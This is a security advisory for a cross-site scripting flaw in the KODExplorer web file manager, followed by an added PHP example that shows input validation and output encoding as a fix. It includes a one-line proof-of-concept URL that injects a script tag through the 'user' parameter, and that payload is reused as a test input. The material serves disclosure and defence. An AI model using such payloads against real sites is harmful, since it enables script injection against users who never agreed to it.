
KODExplorer Web File Manager Cross Site Scripting

Posted on 30 December 2015

================================================================================
# KODExplorer web file manager - Cross Site Scripting
================================================================================
# Vendor Homepage: https://github.com/kalcaddle/KODExplorer/ - http://kalcaddle.com/
# Date: 30-Dec-2015
# Software Link: https://github.com/kalcaddle/KODExplorer/archive/master.zip
# Exploit Author : Ben Khlifa Fahmi - Xtnr3v0lt
================================================================================
# Vulnerable File : file.php
# Vulnerable Code : check line 55 on the template/file.php
# PoC : http://localhost/index.php?share/file&user=admin"></script><script>alert('xss')</script>&sid=
Vulnerable Parameters : admin , sid
Patch released : Check my git https://github.com/xtnr3v0lt/KODExplorer
================================================================================
# Discovered By : Ben Khlifa Fahmi(https://www.benkhlifa.com/) from Tunisian Whitehats Security (@WhitehatsTN)
================================================================================
Special Thanks to both the community Tunisian Whitehats Security and Arab Oracle Users Group
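
The advisory does not reproduce line 55 of template/file.php, so the following is an added PHP example, not KODExplorer's code or the author's patch: a hypothetical share template that validates the user and sid parameters and encodes them for each output context. The function names, the allowlist pattern and the rendered markup are assumptions.

```php
<?php
// Added example: hypothetical stand-in for a share template that echoes
// request parameters. Not KODExplorer's actual code.

// Allowlist validation: accept only plain identifiers. Non-string input
// (e.g. user[]=x arrives as an array) is rejected as well.
// The character set and length limit are assumptions for this sketch.
function clean_id($value, int $max = 64): string
{
    if (!is_string($value) || !preg_match('/\A[A-Za-z0-9_.-]{1,' . $max . '}\z/', $value)) {
        return '';
    }
    return $value;
}

// HTML text / attribute context.
function html_ctx(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Inline <script> context: JSON literal with <, >, &, ' and " hex-escaped so
// the value cannot close the string or the script element.
function js_ctx(string $value): string
{
    $flags = JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT;
    return json_encode($value, $flags | JSON_THROW_ON_ERROR);
}

function render_share(array $query): string
{
    $user = clean_id($query['user'] ?? null);
    $sid  = clean_id($query['sid'] ?? null);
    if ($user === '' || $sid === '') {
        return "400 Bad Request\n";
    }
    return '<a href="?share/file&amp;user=' . rawurlencode($user)
         . '&amp;sid=' . rawurlencode($sid) . '">' . html_ctx($user) . "</a>\n"
         . '<script>var G = {user: ' . js_ctx($user) . ', sid: ' . js_ctx($sid) . "};</script>\n";
}

// Constructed inputs: one benign, one carrying the markup from the PoC above.
echo render_share(['user' => 'admin', 'sid' => 'a1B2c3']);
echo render_share(['user' => 'admin"></script><script>alert(\'xss\')</script>', 'sid' => '']);
// The encoder alone still neutralises the value if validation is ever relaxed.
echo js_ctx('admin"></script>'), "\n";
```

Validation and encoding are applied together here so that either one failing or being loosened later does not reopen the injection point.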

 
